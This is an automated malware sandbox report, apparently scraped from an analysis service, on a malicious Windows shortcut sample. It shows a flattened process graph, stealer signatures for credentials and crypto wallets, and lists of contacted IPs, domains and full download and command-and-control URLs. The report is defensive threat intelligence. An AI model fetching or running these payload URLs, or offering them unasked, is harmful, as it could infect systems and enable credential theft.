Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D0CDF4 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 14_2_0000023D20D0CDF4
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529311 Sample: rpQF1aDIK4.lnk Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 64 rocketdocs.lol 2->64 66 bemostake.space 2->66 68 1h982d.bemostake.space 2->68 86 Suricata IDS alerts for network traffic 2->86 88 Found malware configuration 2->88 90 Windows shortcut file (LNK) starts blacklisted processes 2->90 92 17 other signatures 2->92 10 regsvr32.exe 1 2 2->10         started        13 cmd.exe 1 2->13         started        15 regsvr32.exe 2->15         started        signatures3 process4 dnsIp5 110 Sets debug register (to hijack the execution of another thread) 10->110 18 OpenWith.exe 10->18         started        112 Windows shortcut file (LNK) starts blacklisted processes 13->112 114 Obfuscated command line found 13->114 22 powershell.exe 14 18 13->22         started        25 conhost.exe 1 13->25         started        82 185.196.9.174 SIMPLECARRIERCH Switzerland 15->82 84 8.8.8.8 GOOGLEUS United States 15->84 116 System process connects to network (likely due to code injection or exploit) 15->116 signatures6 process7 dnsIp8 70 147.45.126.71, 3752, 49855 FREE-NET-ASFREEnetEU Russian Federation 18->70 94 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->94 96 Tries to steal Mail credentials (via file / registry access) 18->96 98 Found many strings related to Crypto-Wallets (likely being stolen) 18->98 106 2 other signatures 18->106 27 rekeywiz.exe 18->27         started        31 wmpshare.exe 18->31         started        33 rekeywiz.exe 18->33         started        72 rocketdocs.lol 188.114.96.3, 443, 49752, 49758 CLOUDFLARENETUS European Union 22->72 56 C:\Users\user\Desktop\utox_x86_x64.exe, PE32+ 22->56 dropped 58 C:\Users\Public\ajbs50ul.bat, PE32+ 22->58 dropped 100 Drops PE files to the user root directory 22->100 102 Powershell creates an autostart link 22->102 104 Powershell drops PE file 22->104 35 ajbs50ul.bat 1 22->35         started        37 utox_x86_x64.exe 1 36 22->37         started        file9 signatures10 process11 dnsIp12 60 C:\Users\user\AppData\Roaming\u0ow.ini, PE32+ 27->60 dropped 40 powershell.exe 27->40         started        43 regsvr32.exe 27->43         started        118 Writes to foreign memory regions 31->118 120 Allocates memory in foreign processes 31->120 45 dllhost.exe 31->45         started        62 C:\Users\user\AppData\Roaming\miEk.ini, PE32+ 35->62 dropped 122 Windows shortcut file (LNK) starts blacklisted processes 35->122 124 Multi AV Scanner detection for dropped file 35->124 126 Suspicious powershell command line found 35->126 128 Found direct / indirect Syscall (likely to bypass EDR) 35->128 48 powershell.exe 35 35->48         started        50 regsvr32.exe 35->50         started        74 104.223.122.15, 3389, 49866 ASN-QUADRANET-GLOBALUS United States 37->74 76 192.168.2.9, 33445, 3389, 3752 unknown unknown 37->76 78 23 other IPs or domains 37->78 file13 signatures14 process15 dnsIp16 52 conhost.exe 40->52         started        80 46.29.238.96 EUROTELECOM-ASRU Russian Federation 45->80 108 Loading BitLocker PowerShell Module 48->108 54 conhost.exe 48->54         started        signatures17 process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.93.190.6
 unknown Ukraine
15713 GCN-UA false
104.233.104.126
 unknown Saudi Arabia
13886 CLOUD-SOUTHUS false
148.251.23.146
 unknown Germany
24940 HETZNER-ASDE false
163.172.136.118
 unknown United Kingdom
12876 OnlineSASFR false
95.215.44.78
 unknown Latvia
52173 MAKONIXLV false
193.124.186.205
 unknown Russian Federation
35196 IHOR-ASRU false
46.29.238.96
 unknown Russian Federation
34804 EUROTELECOM-ASRU true
8.8.8.8
 unknown United States
15169 GOOGLEUS false
37.97.185.116
 unknown Netherlands
20857 TRANSIP-ASAmsterdamtheNetherlandsNL false
130.133.110.14
 unknown Germany
680 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese false
194.249.212.109
 unknown Slovenia
2107 ARNES-NETAcademicandResearchNetworkofSloveniaSI false
136.243.141.187
 unknown Germany
24940 HETZNER-ASDE false
37.187.122.30
 unknown France
16276 OVHFR false
147.45.126.71
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
185.14.30.213
 unknown Ukraine
21100 ITLDC-NLUA false
185.58.206.164
 unknown Russian Federation
35196 IHOR-ASRU false
51.254.84.212
 unknown France
16276 OVHFR false
80.87.193.193
 unknown Russian Federation
29182 THEFIRST-ASRU false
46.229.52.198
 unknown Ukraine
34056 KIEVNETKievNetISPASUA false
104.223.122.15
 unknown United States
8100 ASN-QUADRANET-GLOBALUS true
205.185.116.116
 unknown United States
53667 PONYNETUS false
85.21.144.224
 unknown Russian Federation
8402 CORBINA-ASOJSCVimpelcomRU false
188.114.96.3
 bemostake.space European Union
13335 CLOUDFLARENETUS false
185.196.9.174
 unknown Switzerland
42624 SIMPLECARRIERCH true
198.98.51.198
 unknown United States
53667 PONYNETUS false

Private

IP
192.168.2.8
192.168.2.7
192.168.2.9
192.168.2.5
192.168.2.255

Contacted Domains

Name IP Active
bemostake.space 188.114.96.3 true
1h982d.bemostake.space 188.114.96.3 true
rocketdocs.lol 188.114.96.3 true
s-part-0017.t-0009.t-msedge.net 13.107.246.45 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm true
    		unknown
    https://rocketdocs.lol/utox_x86.exe false
      		unknown
      https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe false
        		unknown
        https://1h982d.bemostake.space/test.txt false
          		unknown